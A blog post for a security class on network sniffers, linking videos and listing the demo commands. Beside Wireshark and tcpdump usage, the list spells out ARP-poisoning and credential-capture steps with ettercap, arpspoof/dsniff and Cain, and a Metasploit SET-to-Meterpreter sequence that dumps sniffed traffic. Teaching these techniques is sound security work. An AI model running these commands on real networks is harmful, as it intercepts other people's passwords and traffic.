This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep and Xplico. I lost part of Gary's on screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.
Part 1: Intro to Sniffers
Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.
Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi
Part 2: Wireshark and Wireless with Gary Hampton
Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.
Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi
Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.
Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.
Part 1: Intro to Sniffers
Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.
Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi
Part 2: Wireshark and Wireless with Gary Hampton
Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.
Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi
Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMinor, Firesheep, Xplico and bridging.
Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.
Commands used:
Wireshark Demo 1. Run Wireshark 2. Basic start capture 3. Start capture with options 4. Drill down OSI 5. Capture filter options (4.9 in book) not tcp port 3389 not broadcast and not multicast 6. Show a packet 7. Pop a packet out 8. Sort by columns 9. Follow stream (web traffic) 10. Export HTTP Objects 11. Simple view filters tcp.port == 80 !(ip.addr == 192.168.1.13) 12. Filter builder 13. Apply filters from different panes (packet vs. details panes). 14. Save filters 15. Open a Wiki page 16. Edit-> Find packet 17. Analyzers ->Expert Info 18. Analyzers ->Firewall ACLs 19. Stats 20. Color rules 21. Save capture 22. Mention Lua Dumpcap/TCPDump dumpcap –D dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap Sniffing in Monitor mode ifconfig wlan0 down iwconfig wlan0 mode monitor iwconfig wlan0 channel 1 ifconfig wlan0 up Ettercap Demo 1. ettercap -T –q –i eth0 -M ARP // // 2. ettercap -T –q –i eth0 -M ARP // /10.1.1.1/ 3. Show ARP traffic 4. Telnet to 10.1.1.1 5. http to 10.1.1.1 6. FTP/Telnet/HTTP someplace with a password 7. Show find sniffers ettercap –G ettercap –T –I eth0 –P list ettercap –T –I eth0 –P search_promisc // 8. Filters: etterfilter ig.filter -o ig.ef ettercap -T -q -F ig.ef -M ARP // // 9. Mention MITM: icmp, dhcp, port filters 10. driftnet -i eth0 11. Etherape | Cain Demo 1. Start poisoning 2. Telnet to 10.1.1.1 3. http to 10.1.1.1 4. FTP/Telnet/HTTP someplace with a password 5. SSL someplace from VM 6. Sniff RDP ARPSpoof Demo cat /proc/sys/net/ipv4/ip_forward echo 1 > /proc/sys/net/ipv4/ip_forward arpspoof -i eth0 10.0.0.1 arpspoof -i eth0 -t 10.0.0.113 10.0.0.1 dsniff –I eth0 -c NetworkMiner 1. TCP fingerprinting 2. Host details 3. DHCP finger printing 4. File capture 5. Passwords 6. Plaintext 7. Open pcap Bridging in Linux setup sudo apt-get install bridge-utils Script to setup MAC bridging: ifconfig eth0 0.0.0.0 ifconfig eth1 0.0.0.0 brctl addbr mybridge brctl addif mybridge eth0 brctl addif mybridge eth1 ifconfig mybridge up Things to show while bridged ifconfig sudo tcpdump -i mybridge -s 0 -w out.cap sudo etherape -i mybridge sudo driftnet -i mybridge Metasploit/SET Backtrack->Penetration->SET Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no <go to page> sessions -i 1 use sniffer help sniffer_interfaces sniffer_start 2 sniffer_dump 2 /tmp/all.cap <Show in Wireshark> |
0 comments: